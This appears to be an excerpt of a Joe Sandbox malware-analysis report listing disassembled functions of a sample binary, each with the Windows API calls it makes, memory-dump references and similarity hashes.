Function 00E7E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00E7E0BE
CharLowerBuffW.USER32(?,?), ref: 00E7E101

Part of subcall function 00E7D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00E7D7C5

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00E7E301
_memmove.LIBCMT ref: 00E7E314

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 4a575d43727e7abfc1d5e2f2444046703e4a02453da31af1a7e0483e00d0eb32
Instruction ID: b9d581dc18476c2666c74b4a26d49c56ea9ab348cd75ffa54844593487ca3f56
Opcode Fuzzy Hash: 4a575d43727e7abfc1d5e2f2444046703e4a02453da31af1a7e0483e00d0eb32
Instruction Fuzzy Hash: B1C15A716083019FC704DF28C48196ABBE4FF89718F14996EF899AB392D730E946CB81

Function 00E78093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00E780C3
CoUninitialize.OLE32 ref: 00E780CE

Part of subcall function 00E5D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00E5D5D4

VariantInit.OLEAUT32(?), ref: 00E780D9
VariantClear.OLEAUT32(?), ref: 00E783AA

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 2e894bc3c15df40a8bc20c5234adcf0df1a333da20bdf127808dd447dd68eea4
Instruction ID: b396734fe90a4c4cc22d45bb2d7d7ca461d8892c8a3e73cf9d9f117e585c453a
Opcode Fuzzy Hash: 2e894bc3c15df40a8bc20c5234adcf0df1a333da20bdf127808dd447dd68eea4
Instruction Fuzzy Hash: 54A189756047019FCB04DF64C985B2AB7E4BF99324F04944DF99AAB3A2CB30EC44CB92

Function 00E5687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00E5688E
SysAllocString.OLEAUT32(00000000), ref: 00E56937
VariantCopy.OLEAUT32 ref: 00E56966
VariantClear.OLEAUT32(?), ref: 00E5698D

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: af1d0dc5d8fbd0fa37f8de3d9d09ac446fb578c7ecdca0efd47dc13ee6d2d7ce
Instruction ID: b291f8ddb58495f35f7f88475a306ca483b27a9223c5a103f9c82712df79417b
Opcode Fuzzy Hash: af1d0dc5d8fbd0fa37f8de3d9d09ac446fb578c7ecdca0efd47dc13ee6d2d7ce
Instruction Fuzzy Hash: 8B5191747003019EDF24AF65D891A6AB3E5AF45315FA0FC1FE996FB293DA70D8888701

Function 00E897F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(013BE5B0,?), ref: 00E89863
ScreenToClient.USER32(00000002,00000002), ref: 00E89896
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00E89903

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: ee53e5c0065b988a2e642640645eb99086926cc51c201572516d7d859d820787
Instruction ID: 7c1f03b9df76e0ccb9b970204432434b5c554248369387255dc77142fc303240
Opcode Fuzzy Hash: ee53e5c0065b988a2e642640645eb99086926cc51c201572516d7d859d820787
Instruction Fuzzy Hash: B0512D35A00209AFCB14DF54C884ABE7BB5FF85364F149269F85DAB2A1D731AD81CB90

Function 00E59A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00E59AD2
__itow.LIBCMT ref: 00E59B03

Part of subcall function 00E59D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00E59DBE

SendMessageW.USER32(?,0000110A,00000001,?), ref: 00E59B6C
__itow.LIBCMT ref: 00E59BC3

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: d974afb8f067bfaeb45359c0989d76774bc3903932fb95448d5d126c8718c719
Instruction ID: d2847e1965cdf14a68e47a3801fee60b32cf562b6ef309a0a63df2f5a45cecf5
Opcode Fuzzy Hash: d974afb8f067bfaeb45359c0989d76774bc3903932fb95448d5d126c8718c719
Instruction Fuzzy Hash: 29417F70A00208ABEF11EF54D845BEE7BF9EF48715F001459FD45B6292DB74AD88CBA1

Function 00E769AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00E769D1
WSAGetLastError.WSOCK32(00000000), ref: 00E769E1

Part of subcall function 00E09837: __itow.LIBCMT ref: 00E09862
Part of subcall function 00E09837: __swprintf.LIBCMT ref: 00E098AC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00E76A45
WSAGetLastError.WSOCK32(00000000), ref: 00E76A51

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: 966d07f05f6a46b02fa691e4839802e5a1590bb00a1d973d60e808b11ff18459
Instruction ID: 84ddbccba59070ac17ff317b1813c7e1a56c7f9fca808bda3924f95bbb1854ac
Opcode Fuzzy Hash: 966d07f05f6a46b02fa691e4839802e5a1590bb00a1d973d60e808b11ff18459
Instruction Fuzzy Hash: 6341AE75740600AFEB64AF24CC86F6A77E8DB04B14F04E558FA59BB3D3DA709D408B91

Function 00E7641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00E8F910), ref: 00E764A7
_strlen.LIBCMT ref: 00E764D9

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 59c35d63ec6bcd1e2747bef87ae6c6bf003b257ad846a4a4bbf9bc995263c93a
Instruction ID: 461f13560ddc18ae12ed2d4d31b214239604fcdd33e69a67da8ba0ad879329b4
Opcode Fuzzy Hash: 59c35d63ec6bcd1e2747bef87ae6c6bf003b257ad846a4a4bbf9bc995263c93a
Instruction Fuzzy Hash: 1E418F31600504AFCB14EBA8EC85EAEB7F9AF44318F149555F919B72D3EB30AD44DB50

Function 00E6B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00E6B89E
GetLastError.KERNEL32(?,00000000), ref: 00E6B8C4
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00E6B8E9
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00E6B915

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 3165072b2facd8a57d8849fa11cabf08b9c255c740ee61c24c7321ae4267c91d
Instruction ID: f59cc23f6914b1dd853bb78a2672f12d19fec340231db7970b8add64437a3029
Opcode Fuzzy Hash: 3165072b2facd8a57d8849fa11cabf08b9c255c740ee61c24c7321ae4267c91d
Instruction Fuzzy Hash: DA411879600610DFCB15EF15C485A59BBE1AF9A354F09C098EC4AAB3A3CB30FD81CB91

Function 00E88851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E888DE

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: fcba26e300ba61ef53b48463c685d579ceaa828f8ada244953bf5d50d7b7d8ab
Instruction ID: b70e4f0d98b95a04359927e9094699939f2b7cf430cb2da2299348e00b782445
Opcode Fuzzy Hash: fcba26e300ba61ef53b48463c685d579ceaa828f8ada244953bf5d50d7b7d8ab
Instruction Fuzzy Hash: 5031E134600109AEEB28BA68CE45FB977B5EB49314FD45112FE5DF61A0CA31A9809792

Function 00E8AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00E8AB60
GetWindowRect.USER32(?,?), ref: 00E8ABD6
PtInRect.USER32(?,?,00E8C014), ref: 00E8ABE6
MessageBeep.USER32(00000000), ref: 00E8AC57

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: ba6831bad3eef864172a88b1f61fc48a5c4f5ecd18af3b025f7adc07df6c4b51
Instruction ID: 9722a2b8ab1799078f906ff0c6aa2b8c52846483f3e69d064c058bc0209d95d3
Opcode Fuzzy Hash: ba6831bad3eef864172a88b1f61fc48a5c4f5ecd18af3b025f7adc07df6c4b51
Instruction Fuzzy Hash: 4D419F31600108DFEB15EF59C884AA9BBF6FB48300F1890BAE41CAB260D731A845CB92

Function 00E60AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00E60B27
SetKeyboardState.USER32(00000080,?,00000001), ref: 00E60B43
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00E60BA9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00E60BFB

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 699d893639c91ff2c8b12a6f118477fa8113d08fb985c197ca80ed9bd059f824
Instruction ID: 3b4745fc2753fe274b1d60c347a8cdebfcd7acd1c6dcf2df1ff95ff16154c383
Opcode Fuzzy Hash: 699d893639c91ff2c8b12a6f118477fa8113d08fb985c197ca80ed9bd059f824
Instruction Fuzzy Hash: C2314830AC0228AEFB318B29EC05BFBBBA5EB4539DF08925AE485721D1C3758D449761

Function 00E60C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,76AAC0D0,?,00008000), ref: 00E60C66
SetKeyboardState.USER32(00000080,?,00008000), ref: 00E60C82
PostMessageW.USER32(00000000,00000101,00000000), ref: 00E60CE1
SendInput.USER32(00000001,?,0000001C,76AAC0D0,?,00008000), ref: 00E60D33

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 9e12edd9c7047f947f617d47c20afc740561ad826fd1e4eaa3c947809075da68
Instruction ID: 60516eda7d0ebe501e0fb8506394fc6fe42108c2f24a71523b074ac9ac8831e7
Opcode Fuzzy Hash: 9e12edd9c7047f947f617d47c20afc740561ad826fd1e4eaa3c947809075da68
Instruction Fuzzy Hash: 0F315530A802286FFF308B65A804BFFFBA6EB45364F04671AE485721D1C3349D49C7A1

Function 00E361C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00E361FB
__isleadbyte_l.LIBCMT ref: 00E36229
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00E36257
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00E3628D

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: fc12ee44c6f1bd37cd2db12747e28fd566abb29ebd14794e67390efab2059c8f
Instruction ID: b5d6589929babd0002fbc3c9ff5ec737ebfa95538bd9575a38821bf64c5973ef
Opcode Fuzzy Hash: fc12ee44c6f1bd37cd2db12747e28fd566abb29ebd14794e67390efab2059c8f
Instruction Fuzzy Hash: C731BC30605246BFDF218F75CC48BAB7FB9BF42314F169028E864A71A1DB31D950DB90

Function 00E84EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00E84F02

Part of subcall function 00E63641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00E6365B
Part of subcall function 00E63641: GetCurrentThreadId.KERNEL32 ref: 00E63662
Part of subcall function 00E63641: AttachThreadInput.USER32(00000000,?,00E65005), ref: 00E63669

GetCaretPos.USER32(?), ref: 00E84F13
ClientToScreen.USER32(00000000,?), ref: 00E84F4E
GetForegroundWindow.USER32 ref: 00E84F54

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 3f41ecc44665b397f274b89a8d18023490a76944b1453d2e4ed788dab93ddc2d
Instruction ID: f7ad4c8e956adb499edf282c349e468165041ee1aa42c10e759b2f108b9aaaf4
Opcode Fuzzy Hash: 3f41ecc44665b397f274b89a8d18023490a76944b1453d2e4ed788dab93ddc2d
Instruction Fuzzy Hash: CC312DB1E00108AFDB00EFB5C9859EFB7F9EF88300F10546AE415F7242DA719E458BA0

Function 00E63C55 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00E63C7A
Process32FirstW.KERNEL32(00000000,?), ref: 00E63C88
Process32NextW.KERNEL32(00000000,?), ref: 00E63CA8
CloseHandle.KERNEL32(00000000), ref: 00E63D52

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 436c2645881c1bd8c89f2fc1932b6743b687380962faa34f9fe659e34255fba9
Instruction ID: 855d062b3fdf2394135eba78c7491619635110adbad378a1007575110178c8e1
Opcode Fuzzy Hash: 436c2645881c1bd8c89f2fc1932b6743b687380962faa34f9fe659e34255fba9
Instruction Fuzzy Hash: F031E8711083059FD300EF60D885EBFBBE8EF95354F50182DF585A61E1EB71AA49CB92

Function 00E8C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E02612: GetWindowLongW.USER32(?,000000EB), ref: 00E02623

GetCursorPos.USER32(?), ref: 00E8C4D2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00E3B9AB,?,?,?,?,?), ref: 00E8C4E7
GetCursorPos.USER32(?), ref: 00E8C534
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00E3B9AB,?,?,?), ref: 00E8C56E

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 272930275b51b0ec2b112ba8db0cd8556b9e0786d81cbc9595c5e20bc0416160
Instruction ID: 6956d324b3956d90f93577447bb9c91d213bbe06e04c58f00504f3cdf9756535
Opcode Fuzzy Hash: 272930275b51b0ec2b112ba8db0cd8556b9e0786d81cbc9595c5e20bc0416160
Instruction Fuzzy Hash: D231A036600058AFCF25DF99C858EEA7BF5EB0A310F144069F90DAB261C731AD91DBA4

Function 00E58656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E5810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E58121
Part of subcall function 00E5810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E5812B
Part of subcall function 00E5810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E5813A
Part of subcall function 00E5810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E58141
Part of subcall function 00E5810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E58157

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00E586A3
_memcmp.LIBCMT ref: 00E586C6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E586FC
HeapFree.KERNEL32(00000000), ref: 00E58703

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 0030e9c1d178d40dbc49053f2d59df8d795c7a3f6622934db19c7e4a135f1934
Instruction ID: cca9a990e6a33e569dffce32f3e4841ae30d1242cd4a5182e7c50c031df96934
Opcode Fuzzy Hash: 0030e9c1d178d40dbc49053f2d59df8d795c7a3f6622934db19c7e4a135f1934
Instruction Fuzzy Hash: EA219071E01109EFDB10DFA4CA89BEEB7B8EF4430AF154459E844BB241DB70AE09CB50

Function 00E2098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00E209AE

Part of subcall function 00E05A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00E67896,?,?,00000000), ref: 00E05A2C
